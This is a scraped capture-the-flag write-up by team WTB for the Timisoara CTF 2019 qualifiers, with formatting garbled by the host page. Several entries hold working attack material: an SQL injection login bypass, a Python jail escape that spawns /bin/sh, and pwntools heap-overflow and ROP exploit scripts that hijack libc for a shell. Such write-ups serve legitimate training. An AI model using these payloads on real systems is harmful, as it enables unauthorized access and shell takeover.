Timisoara CTF 2019 Quals Write
Timisoara CTF 2019 Quals Write-upTeam : WTBTimisoara CTF 2019 Quals Write-upTeam : WTBRanked : 14Point : 3576MISCRead the rules?(1pts)?-------------------------------------------------------------------------------------------------------Find string “TIMCTF” from homepage : TIMCTF{sometext}WEBNot so empty website?(50pts)?-------------------------------------------------------------------------------------------------------If you wanna get flag, open the code with browser.FLAG: TIMCTF{D0_not_b3_superfic1al}Secret key of swag?(150pts)?-------------------------------------------------------------------------------------------------------In source code of index.php:parse_str($query); -> This syntax has the same effect as “extract($_GET)”. So, I could input value directly to $processed_key.Then, I could input query like ?action=login&processed_key=hax0rThere is a commented flag in the source code of the page.FLAG: IMCTF{Welcome_M4N_of_SW4G}Admin panel?(200pts)?-------------------------------------------------------------------------------------------------------This is sql injection chalEmail : admin@adminPassword : ' or '1' = '1FLAG: TIMCTF{SqL_1nj3ct1on_1s_b4ck_1n_town}CryptoBaby Crypto?(50pts)?-------------------------------------------------------------------------------------------------------just use caesar cipher. then we can get a flag!FLAG: TIMCTF{Julius_Caesar_w0uld_b3_proud}Proof of work?(100pts)?-------------------------------------------------------------------------------------------------------I just bruteforce sha256 and find the hash!Also, I used pypy3, because pypy3 is faster than python3.123456789import?hashlibi?=?0while?True:????string?=?str(i)????encoded_string?=?string.encode()????hexdigest?=?hashlib.sha256(encoded_string).hexdigest()????if?"0000000"?in?str(hexdigest):????????print(str(i)?+":?"?+hexdigest)????i?=?i?+1Colored by Color Scriptercsstring : 365512095FLAG: TIMCTF{9e13449f334ded947431aa5001c2e9ab429ab5ddf880f416fe352a96eb2af122}Alien Alphabet?(150pts)?-------------------------------------------------------------------------------------------------------First, see last sentence and look for character location is similar with flag format. (TIMCTF)So, I think the character replace to English 1:1. Also, I think frequency analyze for the cipher.And I predicted text messagesTIMCTF T?M??I? I? ?????M??M?TIM? -> TIMETIMCTF TEM??I?_I?_??E??MEI thought this was S -> TIMCTF TEM??IS_IS_??ES?ME T?EME -> THEMETIMCTF TEM?HIS_IS_??ES?ME THE?E -> THERE IT ? ?TF - > IT A CTFTIMCTF TEM?HIS_IS_A?ES?MEI think A?ES?ME -> AWESOME TIMCTF TEM?HIS_IS_AWESOMEI guessed the last alphabet from the English wordFLAG: TIMCTF{TEMPHIS_IS_AWESOME}Password breaker?(150pts)?-------------------------------------------------------------------------------------------------------stage 1 : I used johntheripper to dictionary attack. I used rockyou.txt(common password file) as dictionary file.pass : johncena1234stage 2: I used ‘advanced archive password recovery’ tool. and brutefoce with A-Za-z0-9 and special characters.pass : bo$$FLAG: TIMCTF{12345_is_A_bad_passw0rd}TimCTF gamblig service?(200pts)?-------------------------------------------------------------------------------------------------------The random seed is time. so, I opened two pipes and get a number from one and send the number from another at the same time!123456789101112from?pwn?import?*?p?=?remote("89.38.208.143",?21023)p2?=?remote("89.38.208.143",?21023)p.recvuntil(":?")p.sendline("1")p2.recvuntil(":?")p2.sendline("2")n?=?p.recvline()p.close()p2.sendline(n)p2.interactive()Colored by Color ScriptercsFLAG: TIMCTF{Now_You_c4N_ch3at_aT_pacanele}Strange cipher?(250pts)?-------------------------------------------------------------------------------------------------------Just input any ascii character and match the hex values. First, I tried several times to find the value.I just solve by hand, EeeeeeeesayFLAG: TIMCTF{Y0u_really_make_A_diff3rence}ForensicsDeleted file?(100pts)?-------------------------------------------------------------------------------------------------------There are three steps.Step 1. Open the file with hxd editorStep 2. Find string “PNG” and “IEND”Step 3. 9F0400 ~ 9FC2AF drag & Copy and save to ???.pngStep 4. Open the Image and got a flag, Yeah!!!FLAG: flag{I_s33_the_uns33n}Strange image?(100pts)?-------------------------------------------------------------------------------------------------------john.png xor 0x7a = original png file12345678910111213141516171819202122232425import?binasciiimport?refd?=?open("john.png",?"rb")dat?=?fd.read()data?=?binascii.b2a_hex(dat)datas?=?re.findall(r'..',data)red?=?""for?i?in?range(0,?len(datas)):????bit?=?eval("0x"+str(datas[i])+"?^?0x7a")????rad?=?str(hex(bit))????if?len(rad)?==?3?:????????rad?=?rad.replace("0x",?"0x0")????????red?+=?rad????else?:????????red?+=?str(hex(bit))print?redbin_?=?""for?j?in?range(0,?len(red),?4):????binary_d?=?str(red[j:j+4])????binary_d?=?binary_d.replace("0x",?"")????bin_?+=?"\\x"+binary_dfh?=?open("image.png",?"wb")eval("fh.write(b'"+bin_+"')")fh.close()Colored by Color Scriptercsand upload to then, I found strings : HATZ-fL4G: WLPFWI~Eudy3bm3kqxoh$and rot13 the strings. {Brav0_j0hnule! -> ASCII+3TIMCTF{Brav0_j0hnule} it is flag!FLAG: TIMCTF{Brav0_j0hnule}Tri-color QR?(200pts)?-------------------------------------------------------------------------------------------------------Given png file:Using stegsolve, I could find 3 pictures of different QR code images. Then decode it and get 3 parts of flag.part 1: TIMCTF{part 2: Th1s_is_Apart 3: _4_part_Also, I found PK signature in end of hex data. extracted it to zip file, then I found last part of flag.part 4: flag}FLAG: TIMCTF{Th1s_is_A_4_part_flag}ProgrammingSubset sum?(200pts)?-------------------------------------------------------------------------------------------------------I figured out that: when I send just “1 [number of sums]” as answer, then I could pass the test. so, I write a script and run to get a flag.123456789from?pwn?import?*p?=?remote("89.38.208.143",?22021)for?i?in?range(0,10):????p.recvline()????print(p.recvline())????a?=?p.recvline()????p.recvline()????p.sendline("1?"+str(a))p.interactive()Colored by Color ScriptercsFLAG: TIMCTF{W3_like_t0_m33t_in_tHe_m1ddle}Reverse EngineeringMath?(150pts)?-------------------------------------------------------------------------------------------------------open the file with IDA. copy the encoding flag part C code to python code and bruteforce attack(find char and raise x value myself)python3def?solv(input,?q,?p):????key?=?14335727????base64?=?"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"????flag?=?"jveimeqpofewqY3chceAr+G6tPqKiM27u/CLhcbX7MPv"?#44????cipher?=?"0"*44????cipher?=?list(cipher)?????v7?=?0????v5?=?0????for?i?in?range(0,?len(input),?3):????????if?i?>?len(input)-3:????????????break;?????????v6?=?key?^?(ord(input[i?+?2])?|?((ord(input[i?+?1])?|?(ord(input[i])?<<?8))?<<?8))?????????for?j?in?range(0,?3):????????????try:????????????????str(input[i+j])????????????except?:????????????????v5?=1????????for?k?in?range(3,?-1,?-1):????????????v4=0????????????for?l?in?range(5,?-1,?-1):????????????????if?(?v6?&?(1?<<?(6?*?k?+?l))?):????????????????????v4?|=?1?<<?l????????????if?v4:????????????????cipher[v7]?=?base64[v4]????????????elif?v5:????????????????cipher[v7]?=?"="????????????else?:????????????????cipher[v7]?=?'A'????????????v7?+=?1????cipher?=?''.join(cipher)????x?=?1????if?cipher[x]?==?flag[x]?and?cipher[x+1]?==?flag[x+1]:????????print(chr(q))????????print(p)????????print(cipher)????????print(flag)?#yee?=?"TIMCTF{I_s33_you_UnDeRsTaNd_x86}"yee?=?"TIMCTF{"for?q?in?range(33,?127):????yy?=?yee?+?str(chr(q))????for?p?in?range(33,127):????????yeee?=?yy?+str(chr(p))+str(chr(p))????????solv(yeee,?q,?p)?Colored by Color ScriptercsFLAG: TIMCTF{I_s33_you_UnDeRsTaNd_x86}Pipes?(200pts)?-------------------------------------------------------------------------------------------------------This program creates child processes and communicates through pipe.In the parent process, the input value is passed through the pipe to the child process.In the child process, the input value passed from the parent process was calculated.The parent process then compares the input values calculated by the child process passed from the pipe with the flag array.In other words, calculate the logic of the child process and compare it to the flag array, we can solve the problem. (brute force)This is calculating logic in child processAnd this is flag arraySolve C code (The rol function is taken from Ida and used)FLAG: TIMCTF{N0_n33d_for_piPe_if_there_is_N0_pIpEwEeD}Strange jump?(250pts)-------------------------------------------------------------------------------------------------------The main logic of this program is maybe a fake.Let's go step.Ignore the code below and follow the handler function of the signal function.Ignore the above code and follow the sub_B9A function of the sub_1586 function.We can find sub_E9C function.sub_E9C function is real logic. I entered the sub_E9C function and give the variable a proper name.If you look at the function, you can see that it's almost the same as the Math.copy sub_E9C function C code to python and brute force it!This code is almost same with Math chal.def?solv(input,?q,?p):????base64?=?"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"????flag?=?"VElNQ1RGe2RlQzNwdDF2ZV9FeGNlUDB0aTBuX2g0bmRMZXJ9"?#44????cipher?=?"0"*55????cipher?=?list(cipher)?????v7?=?0????v5?=?0????for?i?in?range(0,?len(input),?3):????????if?i?>?len(input)-3:????????????break;?????????v6?=?(ord(input[i?+?2])?|?((ord(input[i?+?1])?|?(ord(input[i])?<<?8))?<<?8))?????????for?j?in?range(0,?3):????????????try:????????????????str(input[i+j])????????????except?:????????????????v5?=1????????for?k?in?range(3,?-1,?-1):????????????v4=0????????????for?l?in?range(5,?-1,?-1):????????????????if?(?v6?&?(1?<<?(6?*?k?+?l))?):????????????????????v4?|=?1?<<?l????????????if?v4:????????????????cipher[v7]?=?base64[v4]????????????elif?v5:????????????????cipher[v7]?=?"="????????????else?:????????????????cipher[v7]?=?'A'????????????v7?+=?1????cipher?=?''.join(cipher)????y?=?17????if?cipher[y]?==?flag[y]?and?cipher[y+1]?==?flag[y+1]:????????print(chr(q))????????print(p)????????print(cipher)????????print(flag)?#yee?=?“TIMCTF{deC3pt1ve_ExceP0ti0n_h4ndLer}”?yee?=?"TIMCTF{"?for?q?in?range(33,?127):????yy?=?yee?+?str(chr(q))????for?p?in?range(33,127):????????yeee?=?yy?+str(chr(p))+str(chr(p))+str(chr(p))????????solv(yeee,?q,?p)?Colored by Color ScriptercsFLAG: TIMCTF{deC3pt1ve_ExceP0ti0n_h4ndLer}Baby Rev?(50pts)?-------------------------------------------------------------------------------------------------------Open file with IDAFLAG: TIMCTF{Wh0_know5_a5m_kn0ws_R3V}Easy Rev?(75pts)?-------------------------------------------------------------------------------------------------------Open file with IDAThen you can get a string. TIMCTF {ebgngrq13synt}But this is not flagebgngrq13synt -> rot 13 - > rotated13flag FLAG: TIMCTF{rotated13flag}ExploitHiss hiss python?(50pts)?-------------------------------------------------------------------------------------------------------PyjailI got it with this script got shell{}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__im'+'port__']('subprocess').call(["/bin/sh","-s"])FLAG: TIMCTF{h1ss_h1ss_shell}Swag?(100pts)?-------------------------------------------------------------------------------------------------------Open file with IDAFlag in mainFLAG: TIMCTF{1_am_th3_c00kie_m0nsta}Bof-server?(100pts)?-------------------------------------------------------------------------------------------------------Open file with IDA Get Stack addressExploit -> shellcode + dummy + stack address FLAG: TIMCTF{oooverfl0w}Team Manager?(300pts)?-------------------------------------------------------------------------------------------------------Heap overflow There are Three StepsStep 1. Add chunk 1,2 + edit ->puts_got leakStep 2. Pointer got overwrite (free)Step 3. Free - >System - > system(players[v7])Get shellfrom?pwn?import*#context.log_level='debug'?p?=?remote("89.38.208.144",?11114)#p?=?process("./timctf_manager")e?=?ELF("./timctf_manager")libc?=?("./t_libc.so")#libc?=?e.libc?def?add(idx,name,ho,com):????p.recv(1024)????p.sendline("1")????p.recvuntil("(1-4)?")????p.sendline(str(idx))????p.recvuntil("name:?")????p.sendline(name)????p.recvuntil("exploitation:?")????p.sendline(ho)????p.recvuntil("exploit:?")????p.sendline("2")????p.recvuntil("crypto:?")????p.sendline("3")????p.recvuntil("forensics:?")????p.sendline("4")????p.recvuntil("comment:?")????p.sendline(com)?def?delete(idx):????p.recv(1024)????p.sendline("2")????p.recvuntil("(1-4)?")????p.sendline(str(idx))?def?edit(idx,name,com):????p.recv(1024)????p.sendline("3")????p.recvuntil("(1-4)?")????p.sendline(idx)????p.recvuntil("name:?")????p.sendline(name)????p.recvuntil("exploitation:?")????p.sendline(str(0x6873)) #sh????p.recvuntil("exploit:?")????p.sendline(str(0x6873)) #sh????p.recvuntil("crypto:?")????p.sendline(str(0x6873)) #sh????p.recvuntil("forensics:?")????p.sendline(str(0x6873)) #sh????p.recvuntil("comment:?")????p.sendline(com)??add(1,?"AAAA",?"0",?"aaaa")add(2,?"BBBB",?"0",?"bbbb")?pay??=?"A"*256pay?+=?p64(0)pay?+=?p64(0x0000000000000061)pay?+=?p64(0)pay?+=?p64(0)pay?+=?p64(e.got['puts'])?edit("1",?"ABCD",?pay)?p.sendline("4")p.recvuntil("(1-4)?")p.sendline("2")p.recvuntil("comment:?")?leak?=??u64(p.recv(6).ljust(8,'\x00'))("leak?=?"?+?hex(leak))?libc_base?=?leak?-?0x809c0?#libc.symbols['puts']("libc_base?=?"?+?hex(libc_base))?system?=?libc_base?+?0x4f440#libc.symbols['system']("system?=?"?+?hex(system))?pay2??=?"C"*256pay2?+=?p64(0)pay2?+=?p64(0x0000000000000061)pay2?+=?p32(0x10)+p32(0x20)+p32(16)+p32(16)pay2?+=?p64(e.got['free'])?edit("1",?"QWER",?pay2)delete(1)edit("2",p64(system),p64(system))delete(2)?p.interactive()Colored by Color Scriptercs FLAG: TIMCTF{Heap_overfl0ws_are_really_B4D}Flag manager service?(400pts)?-------------------------------------------------------------------------------------------------------I choose rop between fsb and rop.libc leak - > main -> one_shot (magic)from?pwn?import*context.log_level='debug'?p?=?remote("89.38.208.144",?11115)#p?=?process("./flag_manager01")e?=?ELF("./flag_manager01")libc?=?("./libc-2.27.so")?read_got?=?e.got['read']puts_plt?=?e.plt['puts']bss?=?e.bss()binsh?=?"/bin/sh\x00"pr?=?0x004008a3main?=?0x4006d7?p.recvuntil("name:?")?pay??=?"A"*88pay?+=?p64(pr)+p64(read_got)+p64(puts_plt)pay?+=?p64(main)?p.sendline(pay)p.recvuntil(":?")?p.sendline("1234")p.recvuntil("NOOOOOOOOO!\n\n")?leak?=?u64(p.recv(6)+"\x00\x00")("leak?=?"?+?hex(leak))?libc_base?=?leak?-?0x110070?#libc.symbols['read']???#("libc_base?=?"?+?hex(libc_base))?one_shot?=?libc_base?+?0x4f2c5#0x45216?pay2??=?"A"*88pay2?+=?p64(one_shot)?p.sendline(pay2)?p.interactive()Colored by Color ScriptercsFLAG : TIMCTF{d3v_fd_i5_sn3aky_backd00r} ................
................
In order to avoid copyright disputes, this page is only a partial summary.
To fulfill the demand for quickly locating and searching documents.
It is intelligent file search solution for home and business.
Related searches
- how to write a business plan
- how to write a teaching philosophy
- interesting topics to write about
- write a company review
- how to write a business
- how to write a company bio
- how to write a good review
- write a good review example
- write off vehicle for business
- write a company review examples
- 2019 tax write offs checklist
- 2019 2019 scariest pranks